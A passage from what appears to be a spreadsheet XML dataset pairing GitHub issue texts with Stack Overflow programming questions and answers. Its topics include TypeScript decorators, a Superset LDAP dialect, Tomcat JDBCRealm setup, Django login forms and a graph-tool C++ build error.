    method(): void { }
}
Replace Constructor
An alternate solution would be to replace the constructor within the decorator - so you add the method, and the constructor call to the method, within the decorator - thus ensuring that the implementation will be there.
function decorator(target: any) {
    const original = target;
    const constr: any = (...args) =&gt; {
        const c: any = () =&gt; {
            return original.apply(null, args);
        }
        c.prototype = original.prototype;
        c.prototype.method = function () { alert('method');};
        const inst = new c();
        inst.method();
        return inst;
    }
    constr.prototype = original.prototype;
    return constr;
}
@decorator
class Test {
    constructor() {
    }
}
const test = new Test();
Inheritance
This is the boring, but often correct solution (and if you don't want to inherit, you could delegate instead):
class HasMethod {
    method() {
        alert('Method');
    }
}
class Test extends HasMethod {
    constructor() {
        super();
        this.method();
    }
}
const test = new Test();</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Apache Superset 4.1.1. docker compose setup and trying to connect Superset to LDAP using ldapjdbc driver. I am using openldap jdbc driver, also used CDataâ€™s ldap jdbc driver.&lt;/p&gt;
&lt;p&gt;I wrote a SQLAlchemy custom dialect which uses jaydebeapi DBAPI implementation to connect using JDBC driver. I added the Database type Other and specified custom dialect, and Apache superset is able to connect to the database successfully when tested with Test Connection. But when I go to Dataset and select the Database (Other), it gets the schema but it fails to retrieve the tables&lt;/p&gt;
&lt;p&gt;The Setup&lt;/p&gt;
&lt;p&gt;â€”â€”â€”â€”â€”â€”â€”â€”â€”&lt;/p&gt;
&lt;p&gt;I tested the JDBC driver for SQL queries and it works fine. Since the schema and table queries might be different for different drivers, I am trying to first test the custom dialect with hardcoded schema and table names.&lt;/p&gt;
&lt;p&gt;Following is my custom dialect :&lt;/p&gt;
&lt;p&gt;'&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
import jaydebeapi
from sqlalchemy.engine import default
from sqlalchemy.engine.url import URL
import logging
logging.basicConfig()
logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)
class CustomJDBCDialect(default.DefaultDialect):
    driver='jaydebeapi'
    name='custom_jdbc'
    supports_alter = False
    supports_sequences = False
    preexecute_autoincrement_sequences = False
    supports_native_boolean = False
    def create_connect_args(self, url: URL):
        jdbc_driver='cdata.jdbc.ldap.LDAPDriverâ€™        # even used openldapâ€™s ldapjdbc driver too.
        jdbc_url = 'jdbc:ldap:user=uid=testuser;password=&amp;lt;passwordhere&amp;gt;;Server=host.docker.internal;Port=636;BaseDN=ou=users,dc=test,dc=com;LDAPVersion=3;'
        jdbc_creds = ['uid=testuserâ€™, â€˜&amp;lt;passwordhere&amp;gt;â€™]
        jar_path = '/app/pythonpath/LDAPJDBCDriver/lib/cdata.jdbc.ldap.jar'
        return ([jdbc_driver, jdbc_url, jdbc_creds, jar_path], {})
    @classmethod
    def dbapi(cls):
        return jaydebeapi
    def get_connection(self, *args, **kwargs):
        jdbc_driver='cdata.jdbc.ldap.LDAPDriver'
        jdbc_url = 'jdbc:ldap:user=uid=testuser;password=&amp;lt;passwordhere&amp;gt;;Server=host.docker.internal;Port=636;BaseDN=ou=users,dc=test,dc=com;LDAPVersion=3;''
        jdbc_creds = ['uid=testuserâ€™, â€˜&amp;lt;passwordhere&amp;gt;â€™]
        jar_path = '/app/pythonpath/LDAPJDBCDriver/lib/cdata.jdbc.ldap.jar'
        return jaydebeapi.connect(jdbc_driver, jdbc_url, ['uid=testuserâ€™, â€˜&amp;lt;â€˜passwordhere&amp;gt;], '/app/pythonpath/LDAPJDBCDriver/lib/cdata.jdbc.ldap.jar')
    def get_schema_names(self, connection, **kw):
        return ['publicschema']
    def has_table(self, connection, table_name, **kwargs):
        return true
    def get_table_names(self, connection, schema=None, **kw):
        &amp;quot;&amp;quot;&amp;quot;
        Fetch the list of table names from the database.
        &amp;quot;&amp;quot;&amp;quot;
        #cursor = connection.cursor()
        #cursor.execute('SELECT CN FROM person')
        #return [row[0] for row in cursor.fetchall()]
        return ['table1','table2','table3']
    def get_columns(self, connection, table_name, schema=None, **kw):
        columns_info = {
            'table1': [
                {'name': 'id', 'type': 'INTEGER', 'nullable': False, 'default': None},
                {'name': 'name', 'type': 'VARCHAR', 'nullable': True, 'default': None},
            ],
            'table2': [
                {'name': 'id', 'type': 'INTEGER', 'nullable': False, 'default': None},
                {'name': 'description', 'type': 'TEXT', 'nullable': True, 'default': None},
            ],
            'table3': [
                {'name': 'id', 'type': 'INTEGER', 'nullable': False, 'default': None},
                {'name': 'value', 'type': 'FLOAT', 'nullable': True, 'default': 0.0},
            ],
        }
        return columns_info.get(table_name, [])
    def do_begin(self, dbapi_connection):
        # Override to do nothing
        pass
    def do_commit(self, dbapi_connection):
        # Override to do nothing
        pass
    def do_rollback(self, dbapi_connection):
        # Override to do nothing
        pass
# Register the dialect
from sqlalchemy.dialects import registry
#registry.register(&amp;quot;custom_jdbc&amp;quot;, __name__, &amp;quot;CustomJDBCDialect&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;'&lt;/p&gt;
&lt;p&gt;The Problem/Issue&lt;/p&gt;
&lt;p&gt;â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”&lt;/p&gt;
&lt;p&gt;The apache superset docker shows the following logs, from which I couldnâ€™t deduce anything :&lt;br /&gt;
'&lt;/p&gt;
&lt;p&gt;INFO:sqlalchemy.engine.Engine:[cached since 359.9s ago] {'action': 'DatasetRestApi.get_list', 'user_id': 1, 'dashboard_id': 0, 'slice_id': 0, 'json': '{&amp;quot;path&amp;quot;: &amp;quot;/api/v1/dataset/&amp;quot;, &amp;quot;q&amp;quot;: &amp;quot;(filters:!((col:database,opr:rel_o_m,value:2),(col:schema,opr:eq,value:publicschema),(col:sql,opr:dataset_is_null_ ... (89 characters truncated) ...Â  &amp;quot;value&amp;quot;: 2}, {&amp;quot;col&amp;quot;: &amp;quot;schema&amp;quot;, &amp;quot;opr&amp;quot;: &amp;quot;eq&amp;quot;, &amp;quot;value&amp;quot;: &amp;quot;publicschema&amp;quot;}, {&amp;quot;col&amp;quot;: &amp;quot;sql&amp;quot;, &amp;quot;opr&amp;quot;: &amp;quot;dataset_is_null_or_empty&amp;quot;, &amp;quot;value&amp;quot;: true}], &amp;quot;page&amp;quot;: 0}}', 'dttm': datetime.datetime(2025, 2, 19, 4, 18, 29, 588733), 'duration_ms': 15, 'referrer': 'http://localhost:8088/dataset/add/'}&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; INFO:sqlalchemy.engine.Engine:SELECT ssh_tunnels.uuid AS ssh_tunnels_uuid, ssh_tunnels.created_on AS ssh_tunnels_created_on, ssh_tunnels.changed_on AS ssh_tunnels_changed_on, ssh_tunnels.extra_json AS ssh_tunnels_extra_json, ssh_tunnels.id AS ssh_tunnels_id, ssh_tunnels.database_id AS ssh_tunnels_database_id, ssh_tunnels.server_address AS ssh_tunnels_server_address, ssh_tunnels.server_port AS ssh_tunnels_server_port, ssh_tunnels.username AS ssh_tunnels_username, ssh_tunnels.password AS ssh_tunnels_password, ssh_tunnels.private_key AS ssh_tunnels_private_key, ssh_tunnels.private_key_password AS ssh_tunnels_private_key_password, ssh_tunnels.created_by_fk AS ssh_tunnels_created_by_fk, ssh_tunnels.changed_by_fk AS ssh_tunnels_changed_by_fk&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; FROM ssh_tunnels&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; WHERE ssh_tunnels.database_id = %(database_id_1)s&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; INFO:sqlalchemy.engine.Engine:[cached since 330.4s ago] {'database_id_1': 2}&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; INFO:sqlalchemy.engine.Engine:COMMIT&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; DEBUG:superset.models.core:Database._get_sqla_engine(). Masked URL: custom_jdbc://host.docker.internal:636/&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; INFO:werkzeug:172.19.0.1 - - [19/Feb/2025 04:18:29] &amp;quot;GET /api/v1/dataset/?q=(filters:!((col:database,opr:rel_o_m,value:2),(col:schema,opr:eq,value:publicschema),(col:sql,opr:dataset_is_null_or_empty,value:!t)),page:0) HTTP/1.1&amp;quot; 200 -&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; INFO:sqlalchemy.engine.Engine:INSERT INTO logs (action, user_id, dashboard_id, slice_id, json, dttm, duration_ms, referrer) VALUES (%(action)s, %(user_id)s, %(dashboard_id)s, %(slice_id)s, %(json)s, %(dttm)s, %(duration_ms)s, %(referrer)s) RETURNING logs.id&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; INFO:sqlalchemy.engine.Engine:[cached since 359.9s ago] {'action': 'DatabaseRestApi.tables', 'user_id': 1, 'dashboard_id': 0, 'slice_id': 0, 'json': '{&amp;quot;path&amp;quot;: &amp;quot;/api/v1/database/2/tables/&amp;quot;, &amp;quot;q&amp;quot;: &amp;quot;(force:!f,schema_name:publicschema)&amp;quot;, &amp;quot;url_rule&amp;quot;: &amp;quot;/api/v1/database/&amp;lt;int:pk&amp;gt;/tables/&amp;quot;, &amp;quot;object_ref&amp;quot;: &amp;quot;DatabaseRestApi.tables&amp;quot;, &amp;quot;pk&amp;quot;: 2, &amp;quot;rison&amp;quot;: {&amp;quot;force&amp;quot;: false, &amp;quot;schema_name&amp;quot;: &amp;quot;publicschema&amp;quot;}}', 'dttm': datetime.datetime(2025, 2, 19, 4, 18, 29, 593908), 'duration_ms': 26, 'referrer': 'http://localhost:8088/dataset/add/'}&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; INFO:sqlalchemy.engine.Engine:COMMIT&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; DEBUG:superset.stats_logger:[stats_logger] (incr) DatabaseRestApi.tables.warning&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; DEBUG:superset.stats_logger:[stats_logger] (timing) DatabaseRestApi.tables.time | 27.744207996875048&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; INFO:werkzeug:172.19.0.1 - - [19/Feb/2025 04:18:29] &amp;quot;&lt;strong&gt;GET /api/v1/database/2/tables/?q=(force:!f,schema_name:publicschema) HTTP/1.1&lt;/strong&gt;&amp;quot; 422 -&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; WARNING:superset.views.error_handling:HTTPException&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; Traceback (most recent call last):&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; Â  File &amp;quot;/usr/local/lib/python3.10/site-packages/flask/app.py&amp;quot;, line 1484, in full_dispatch_request&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; Â  Â  rv = self.dispatch_request()&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; Â  File &amp;quot;/usr/local/lib/python3.10/site-packages/flask/app.py&amp;quot;, line 1458, in dispatch_request&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; Â  Â  self.raise_routing_exception(req)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; Â  File &amp;quot;/usr/local/lib/python3.10/site-packages/flask/app.py&amp;quot;, line 1440, in raise_routing_exception&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; Â  Â  raise request.routing_exceptionÂ  # type: ignore&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; Â  File &amp;quot;/usr/local/lib/python3.10/site-packages/flask/ctx.py&amp;quot;, line 353, in match_request&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; Â  Â  result = self.url_adapter.match(return_rule=True)Â  # type: ignore&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; Â  File &amp;quot;/usr/local/lib/python3.10/site-packages/werkzeug/routing/map.py&amp;quot;, line 629, in match&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; Â  Â  raise NotFound() from None&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; INFO:werkzeug:172.19.0.1 - - [19/Feb/2025 04:18:33] &amp;quot;GET /ws HTTP/1.1&amp;quot; 404 -&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; DEBUG:superset.stats_logger:[stats_logger] (incr) health&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_appÂ  Â  Â  Â  Â  |&lt;/strong&gt; INFO:werkzeug:127.0.0.1 - - [19/Feb/2025 04:18:52] &amp;quot;GET /health HTTP/1.1&amp;quot; 200 -&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;superset_worker_beatÂ  |&lt;/strong&gt; [2025-02-19 04:19:00,053: INFO/MainProcess] Scheduler: Sending due task reports.scheduler (reports.scheduler)&lt;/p&gt;
&lt;p&gt;'&lt;/p&gt;
&lt;p&gt;I was thinking if jaydebeapi could log something, but looks like there is no logging in jaydebeapi implementation.&lt;/p&gt;
&lt;p&gt;Is there any issue or anything missing with my custom dialect implementation? Is there any resolution or workaround to this?&lt;/p&gt;
&lt;p&gt;Are there any other ways to connect Apache Superset to LDAP server ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C234</t>
  </si>
  <si>
    <t>Tomcat security and API
That said, the documentation seems to be wrong. I wonder if it is possible to instruct Tomcat to perform authentication only and pass authentication headers to the web application that would then perform authorization. https://stackoverflow.com/questions/7756048/authentication-without-authorization-on-tomcat-7 gives some hope.</t>
  </si>
  <si>
    <t>You have to set the userRoleTable and roleNameCol properties in case of allRolesMode="authOnly" too. Without them the SQL query will contain the String null (as you can see in the message of the exception). The value of userRoleTable could be the same as the value of userTable, and roleNameCol also could be same as userNameCol.
A simple workaround is creating an SQL view which emulates the roles table:
CREATE VIEW roles (username, role)
AS SELECT username, 'user' FROM users;
And a solution:
&lt;Realm className="org.apache.catalina.realm.JDBCRealm" 
    driverName="com.mysql.jdbc.Driver" 
    connectionURL="jdbc:mysql://127.0.0.1:3306/test" 
    connectionName="..." connectionPassword="..." 
    userTable="users" userNameCol="username" userCredCol="password" 
    userRoleTable="users" roleNameCol="username"
/&gt; 
(Surprisingly it works without any allRolesMode.)
The required web.xml snippets:
&lt;security-constraint&gt;
    &lt;web-resource-collection&gt;
        &lt;web-resource-name&gt;protected zone&lt;/web-resource-name&gt;
        &lt;url-pattern&gt;/prot/*&lt;/url-pattern&gt;
    &lt;/web-resource-collection&gt;
    &lt;auth-constraint&gt;
        &lt;role-name&gt;*&lt;/role-name&gt;
    &lt;/auth-constraint&gt;
&lt;/security-constraint&gt;
&lt;security-role&gt;
     &lt;role-name&gt;*&lt;/role-name&gt;
&lt;/security-role&gt;
(Note: Lets say you have 1 million users, a new attribute in the users table with one million user\0 string would cost only around 5 megabytes. I agree with that this is not a beautiful solution but it's not intolerable big nowadays.)</t>
  </si>
  <si>
    <t xml:space="preserve">Are there any tools you would recommend for site architecture design and analysis?  I've checked out several such as Poseidon UML, Adalon and FuseBuilder for ColdFusion, Mindmapper and a few others but have yet to find anything that seems to strike the right balance between allowing for quick high-level planning (as can be accomplished with mind mapping) to more detailed architecture and analysis.  UML seems to be the ultimate for application  design but I don't consider tools such as Poseidon UML to be particularly adept when creating quick initial designs. Is there anything else out there that can be applied to any programming language, from CF to C#.  Perhaps a combination of tools?
</t>
  </si>
  <si>
    <t>C235</t>
  </si>
  <si>
    <t>add authorization layer
The way I'd like to see this implemented is as follows:
some layer (e.g. LDAP module in Apache sitting in front of Tomcat) will provide authentication and pass the result (some sort of user ID, e.g. email address) to OpenGrok within the request in some pre-defined form
a plugin framework (refs http://stackoverflow.com/questions/2104821/implementing-dynamic-plugins-in-java , http://www.javaranch.com/journal/200607/Plugins.html) will be implemented which will allow to add generic authorization plugins
each plugin will offer a boolean check(String user_id, String project_name) method which will give out answer in the form of authorized/not authorized and String getname() method which will return name of the plugin.
if no plugin is loaded no change will be visible
all jsp's will be changed to validate URL of the request using the check() method
if the check does not pass they will return 'Not authorized' web page (HTTP error 401)
the project selector will also filter the list of visible projects based on the check() method, the same is valid for the opensearch generator
in the case of search, if someone passes a link which leads to search of multiple projects and the user is not authorized to access at least one of the projects, the whole request will be denied
if there are multiple authorization plugins loaded, all of them will have to return 'pass' in order for the request to be permitted (similar to PAM framework, just very primitive - something like requisite implicit keyword used for all modules)
Thus, each plugin can use totally different authorization check.</t>
  </si>
  <si>
    <t>This is actually quite easy using plain Java means:
Since you don't want the user to configure the classpath before starting the application, I would first create a URLClassLoader with an array of URLs to the files in your plugin directory. Use File.listFiles to find all plugin jars and then File.toURI().toURL() to get a URL to each file. You should pass the system classloader (ClassLoader.getSystemClassLoader()) as a parent to your URLClassLoader.
If the plugin jars contain a configuration file in META-INF/services as described in the API documentation for java.util.ServiceLoader, you can now use ServiceLoader.load(Plugin.class, myUrlClassLoader) to obatin a service loader for your Plugin interface and call iterator() on it to get instances of all configured Plugin implementations.
You still have to provide your own wrapper around this to filter plugin capabilites, but that shouldn't be too much trouble, I suppose.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This has been hard / confusing, because there are a couple moving pieces:&lt;br /&gt;
I would like to set a format for all dates in a CSV file created by CSVHelper CSVWriter. In a .NET Core (.NET 7.0, C# v11, CSVHelper v30.0.1) application, I was able to put&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    // Add default format for nullable and non-nullable dates
    var csvContext = new CsvContext(new CsvConfiguration(CultureInfo.InvariantCulture));
    csvContext.TypeConverterOptionsCache.GetOptions&amp;lt;DateTime&amp;gt;().Formats = new[] { &amp;quot;yyyy-MM-dd&amp;quot; };
    csvContext.TypeConverterOptionsCache.GetOptions&amp;lt;DateTime?&amp;gt;().Formats = new[] { &amp;quot;yyyy-MM-dd&amp;quot; };
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in the &lt;code&gt;Map&lt;/code&gt; class, before calling &lt;code&gt;Automap&lt;/code&gt;. This gave me the desired output of '2016-03-22', for example.&lt;/p&gt;
&lt;p&gt;I went to implement the same functionality in a .NET Standard (.NET Framework 4.8, CSVHelper v 34 + 30.0.1 - I tried both), and it works inconsistently, varying based on the format string. If I specify a format string of 'yyyy-MM-dd', it fails, outputting the original format, but if I specify 'yyyy=MM-dd', it works, producing the expected, but wrong output of '2016=03-22'. It seems one format string works while the other does not. Hunh?&lt;/p&gt;
&lt;p&gt;Sample Minimal Reproducible Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public static void Main()
    {
        var fileBytes = Array.Empty&amp;lt;byte&amp;gt;();
        var data = new List&amp;lt;Foo&amp;gt; {
            new Foo{Id=987654, Name=&amp;quot;Smith, John&amp;quot;, Birthdate=DateTime.Parse(&amp;quot;3/22/1972&amp;quot;),EntryDate=DateTime.Parse(&amp;quot;8/26/2024&amp;quot;) },
            new Foo{Id=654321, Name=&amp;quot;Doe, Jane&amp;quot;, Birthdate=DateTime.Parse(&amp;quot;8/29/1963&amp;quot;),EntryDate=DateTime.Parse(&amp;quot;8/26/2024&amp;quot;) }
        };
        var csvConfiguration = new CsvConfiguration(CultureInfo.CurrentCulture);
        using (var memoryStream = new MemoryStream())
        {
            using (var streamWriter = new StreamWriter(memoryStream))
            {
                using (var csvWriter = new CsvWriter(streamWriter, csvConfiguration))
                {
                    csvWriter.Context.RegisterClassMap(new FooMap());
                    csvWriter.WriteRecords(data);
                }
            }
            fileBytes = memoryStream.ToArray();
        }
        HttpContext current = HttpContext.Current;
        current.Trace.IsEnabled = false;
        current.Response.Clear();
        current.Response.ContentType = &amp;quot;application/octet-stream&amp;quot;; // or application/force-download
        current.Response.AddHeader(&amp;quot;content-disposition&amp;quot;, &amp;quot;attachment;    filename=SelectedRecords.csv&amp;quot;);
        current.Response.BinaryWrite(fileBytes);
        current.Response.End();
    }
    public class Foo
    {
        public int Id { get; set; }
        public string Name { get; set; }
        public DateTime? Birthdate { get; set; }
        public DateTime? WithdrawDate { get; set; }
        public DateTime? EntryDate { get; set; }
    }
    public class FooMap : ClassMap&amp;lt;Foo&amp;gt;
        {
            public FooMap()
            {
                var csvContext = new CsvContext(new CsvConfiguration(CultureInfo.InvariantCulture));
// Works: the undesired format is successfully applied
// Comment these two lines out and uncomment the following lines.
// The output is '3/22/1972' - the original value with no addt'l formatting                
csvContext.TypeConverterOptionsCache.GetOptions&amp;lt;DateTime&amp;gt;().Formats = new[] { &amp;quot;yyyy#MM-dd&amp;quot; };
                csvContext.TypeConverterOptionsCache.GetOptions&amp;lt;DateTime?&amp;gt;().Formats = new[] { &amp;quot;yyyy#MM-dd&amp;quot; };
                //csvContext.TypeConverterOptionsCache.GetOptions&amp;lt;DateTime&amp;gt;().Formats = new[] { &amp;quot;yyyy-MM-dd&amp;quot; };
                //csvContext.TypeConverterOptionsCache.GetOptions&amp;lt;DateTime?&amp;gt;().Formats = new[] { &amp;quot;yyyy-MM-dd&amp;quot; };
                AutoMap(csvContext);
            }
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;NB: The format I'm looking for is 'yyyy-MM-dd' - date only, not standard format string &lt;code&gt;&amp;quot;o&amp;quot;&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C236</t>
  </si>
  <si>
    <t>Override default AuthenticationForm for our login
The default in Django for some reason is to prefix all labels with
colons, so subclassing the form lets us remove those.
We can also add classes or whatever to the labels if we need, but
it's okay right now.
Found a nice Stackoverflow about subclassing and a Medium post
about removing colons.
Source:
- https://stackoverflow.com/questions/43542442/django-adding-placeholders-to-django-built-in-login-forms
- https://medium.com/@MatheusCAS/overriding-globally-field-label-suffix-in-django-ed3ffb10af7</t>
  </si>
  <si>
    <t>save this content in forms.py
from django import forms
from django.contrib.auth.forms import AuthenticationForm
from django.forms.widgets import PasswordInput, TextInput
class CustomAuthForm(AuthenticationForm):
    username = forms.CharField(widget=TextInput(attrs={'class':'validate','placeholder': 'Email'}))
    password = forms.CharField(widget=PasswordInput(attrs={'placeholder':'Password'}))
in your main urls.py (where your login view called)
from django.contrib.auth import views as auth_views
from app.forms import CustomAuthForm
urlpatterns = [
url(r'^login/$', auth_views.login, name='login', kwargs={"authentication_form":CustomAuthForm}),
]
the extra thing that we done here is added an kwargs kwargs={"authentication_form":CustomAuthForm}
please use this for your future reference django.contrib.auth.views.LoginView and django.contrib.auth.forms.AuthenticationForm</t>
  </si>
  <si>
    <t xml:space="preserve">I am working on a PHP application that intends to ease company workflow and project management, let's say something like [external-link] and [external-link].
I am not sure on what the best approach is, database-wise. Should I use a single database and add client-specific columns to each of the tables, or should I create a database for each new client? An important factor is automation: I want it to be dead simple to create a new client (and perhaps opening the possibility to signing up for yourself).
Possible cons I can think of using one database:
Lack of extensibility
Security problems (although bugs shouldn't be there in the first place)
What are your thoughts on this? Do you have any ideas what solution the above companies are most likely to have chosen? 
</t>
  </si>
  <si>
    <t>C237</t>
  </si>
  <si>
    <t>RuntimeError: Model class django.contrib.auth.models.Permission doesn't declare an explicit app_label
Looks like it's the same issue as mentioned in https://stackoverflow.com/questions/34754907/django-1-9-and-django-contrib-auth
I'll need to have a closer look into that issue and see if we can do something about it.</t>
  </si>
  <si>
    <t>It looks like the only workaround as of now is including django.contrib.auth in INSTALLED_APPS and ignoring the three tables in database.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to write my extensions with &lt;code&gt;graph-tool&lt;/code&gt; following &lt;a href="https://graph-tool.skewed.de/static/doc/demos/cppextensions/cppextensions.html" rel="nofollow noreferrer"&gt;this guide&lt;/a&gt; about &lt;em&gt;Writing extensions in C++&lt;/em&gt; to extend graph-tool with code written in C++.
Following the guide at the link i downloaded the same files for the making of a shared object called &lt;code&gt;libkcore.so&lt;/code&gt; which has to be used precompiled in the python program.&lt;/p&gt;
&lt;p&gt;The whole process can be reproduced downloading files from the page (&lt;code&gt;kcore.hh&lt;/code&gt;, &lt;code&gt;kcore.cc&lt;/code&gt;, &lt;code&gt;kcore.py&lt;/code&gt;) and then running the &lt;code&gt;make&lt;/code&gt; command on the following Makefile&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PY3DOTVERSION=$(shell python -c &amp;quot;import sys; print(sys.version_info[0],sys.version_info[1],sep='.')&amp;quot;)
CXX=g++
CXXFLAGS=-O3 -fopenmp -std=gnu++17 -Wall -fPIC `pkg-config --cflags --libs graph-tool-py$(PY3DOTVERSION)` -shared
ALL: libkcore.so
libkcore.so: kcore.hh kcore.cc
    ${CXX} ${CXXFLAGS} kcore.cc -o libkcore.so
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In my case I have &lt;code&gt;graph-tool&lt;/code&gt; installed with conda and so &lt;code&gt;gcc&lt;/code&gt; (&lt;code&gt;g++&lt;/code&gt;) so that  i had to specify the &lt;code&gt;pkg-config&lt;/code&gt; path adding&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(shell PKG_CONFIG_PATH=$(CONDA_PREFIX)/lib/pkgconfig pkg-config --cflags --libs graph-tool-py$(PY3DOTVERSION))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to my &lt;code&gt;CXXFLAGS&lt;/code&gt; instead of&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;`pkg-config --cflags --libs graph-tool-py$(PY3DOTVERSION)`
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in the Makefile.
Now the output of the compilation seems all ok with no warnings or errors&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;g++ -O3 -fopenmp -std=gnu++17 -Wall -fPIC -pthread -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/include 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/lib/python3.12/site-packages/graph_tool/include 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/lib/python3.12/site-packages/graph_tool/include/boost-workaround 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/lib/python3.12/site-packages/graph_tool/include/pcg-cpp 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/lib/python3.12/site-packages/cairo/include 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/include/python3.12 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/include 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/lib/python3.12/site-packages/numpy/core/include 
    -L&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/lib 
    -lboost_python312 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/include 
    -shared kcore.cc -o libkcore.so
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where &lt;code&gt;&amp;lt;homedir&amp;gt;&lt;/code&gt; is my home directory. Sadly if i run&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ ldd libkcore.so
    not a dynamic executable
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;i suddenly realize that the shared object, which is supposed to be an executable, is not a binary file, rather is a ASCII text file so that when i try importing it in python i get&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; from kcore import kcore_decomposition
Traceback (most recent call last):
  File &amp;quot;&amp;lt;stdin&amp;gt;&amp;quot;, line 1, in &amp;lt;module&amp;gt;
  File &amp;quot;&amp;lt;homedir&amp;gt;/PhD/projects/complex-networks/lrgsglib/src/lrgsglib/gt_patches/cpp/kcore.py&amp;quot;, line 4, in &amp;lt;module&amp;gt;
    import libkcore
ImportError: &amp;lt;homedir&amp;gt;/PhD/projects/complex-networks/lrgsglib/src/lrgsglib/gt_patches/cpp/libkcore.so: invalid ELF header
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Inspecting the &lt;code&gt;libkcore.so&lt;/code&gt; i see a bunch of lines resembling a dump file, a long list of functions and methods beginning with&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# 0 &amp;quot;kcore.cc&amp;quot;
# 0 &amp;quot;&amp;lt;built-in&amp;gt;&amp;quot;
# 0 &amp;quot;&amp;lt;command-line&amp;gt;&amp;quot;
